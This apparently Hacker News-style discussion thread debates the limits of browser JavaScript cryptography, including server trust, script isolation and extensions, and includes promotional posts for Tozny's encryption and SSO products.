As an alternative to this checkout TozID. The premise of their authentication model is to avoid sending the password all together and use public key crypto to sign and verify requests between the client and the auth server.
Note that such system only provides you benefit if the client-implementation is to be trusted.
E.g., if your user-agent does it all for you, you could consider it trusted, but if all the code is provided by the "untrusted" service-provider that you won't want to see your password, it ends up just being for show.
Similar situation with ProtonMail: As long as you use the clients shipped by them (webmail, app), all of the security hinges on nothing but a promise. Their app can read the passwords and keys as much as it wants.
I also found out that protonmail doesn't seem to send the password in plain text in the post request itself. Really keen to see how they do it as well.
It is an SSO platform with authentication based on client side cryptography that enables end-to-end encryption for applications. It supports SAML clients like other SSO platforms.
Browser crypto has come a long way. With libraries like libsodium and proper implementation I think it’s drastically better than at the time of those articles (2013 and 2011).
Source: we also write encryption libraries and have a free implementation of our browser sdk at https://share.labs.tozny.com
No, it's not drastically better than it was in 2013.
People have done lots of things with browser cryptography, that's true. But none of what they've done addresses or mitigates the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server. If you're doing that, you might as well just do the cryptography serverside.
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
It looks like the issues with browser-based cryptography from those two articles fall into three broad groups.
1. You have to trust the server.
2. The browsers don't do a good job of letting a site's JavaScript keep things secret from other things running in the browser.
3. If you implement cryptography in JavaScript, you are probably going to screw it up. There's a lot more to doing it right than just knowing to use AES and whatever the currently favored hash function is.
#1 is probably acceptable in a lot of cases, and #3 can probably be addressed by using the Webassembly version of libsodium.That leaves #2 as the apparently insurmountable issue.
Suppose the user was willing to create a separate Firefox or Chrome profile just for using my web-based app, and did not install any browser plug-ins under that profile, set its home page to my app page, and never used that profile to visit any other sites.
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
These are not quite the same kinds of trust - nearly every request to a compromised web app server is an opportunity to inject malicious code and malicious UI and compromise the clientside part of the app.
Compromising a software update server doesn't necessarily get you any of that - for instance, your 1Password client will presumably verify the authenticity of the update before it applies it.
I don't think the private methods proposal will help with cryptography at all. The "security" it provides boils down to making it difficult for code outside the class to access the value, like you can already do with closures like this:
function makeCounter() {
var x = 0;
return function() { return ++x; };
}
It doesn't help at all with side-channel attacks, which are the main reason why it's hard to safely perform cryptographic operations in a just-in-time interpreted language like JavaScript. It also doesn't stop rogue scripts on the same page from pulling the user's passwords/keys right out of the password field, URL bar, localStorage, or wherever else your script gets them from.
the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server
What do you think of doing JavaScript Crypto in a browser extension? An extension runs code in the browser without persistent trust of a server (at least in the traditional webapp way; you have to persistently trust the extension update server, extension authors, chrome update server, etc). You could do things like quickly, interactively encrypt chunks of text with a symmetric key. Presumably you'd use an extension UI to enter your keys, to avoid keylogging.
I think it would be illuminating to have a small suite of well-implemented cryptographic primitives, curated by a well-known expert, installed and ready to use on any string in the browser.
(BTW why don't we see more random chunks of cyphertext everywhere? It would seem to me a good channel, to use a combination of public forums to transfer short bursts of cyphertext. Where are the encrypted Twitter broadcasts??)
The issue with browser extensions, is that you are not far away from the common hurdles of developing, using and releasing a "real" desktop/mobile application. Having nothing to install and landing on a page that just works, is a big plus for you users.
I wonder why browsers don't build their own browser api for file and mail crypto ... and that way you don't have to trust the server. And you can verify that the server is using browser crypto.
There's no difference between trusting the server to deliver Javascript cryptography source code and trusting the server with your secrets. The server can just deliver code (in a number of different ways) to compromise those secrets.
My understanding from the Apple/FBI fiasco is that it's an open question whether the US government is legally able to compel you to write and deliver custom code to your clients. But any local judge can issue you a warrant to hand over encrypted customer data that you're holding the key to.
But IANAL, maybe my take on that is overly simplistic.
Actually, Filekit is meant to be integrated into an application, and that application is responsible for delivering JS and handling identities, not the Tanker server.
Interestingly, the technology of Signed HTTP Exchanges could potentially be used as the basis for a system that removes the need to trust the server. The current Internet-Draft even includes a section on the Binary Transparency use case:
What's still missing, I think, is a way for a publisher to tell a browser "Only run new code from this domain after checking that the user is happy to upgrade". That would put the "web app" on roughly the same security footing as a desktop application with a built-in update system.
Wondering...browsers do seem to be able to do secure crypto in two existing scenarios: when presenting a client TLS certificate; and when performing authentication via WebAuthn in conjunction with U2F. Would it be possible to re-purpose either of those mechanisms to do other potentially useful secure crypto (e.g. sign blockchain transactions)?
I don't see how you have to trust the server unless it's also serving the client bundle. There are many decentralized use cases where you might "bring your own client" (or maybe one trusted server gives it to you) and use the client to interact with other untrusted servers.
You can have a trusted client and an untrusted server.
I agree w/ OP. Using cryptography for privacy and data control is a step in the right direction and needs some critical mass behind it for broader adoption.
Shameless plug - that is exactly what Tozny provides. An easy way to have end to end crypto with a sharing model that keeps data in control of the original writer.
Helping developers avoid the pitfalls of cryptography is the main problem we at Tozny (http://tozny.com) are trying to solve.
We found that there is so much mis-information available online it's too easy to shoot yourself in the foot with cryptography so we're trying to make tools that make strong crypto easy to implement.
https://tozny.com/tozid/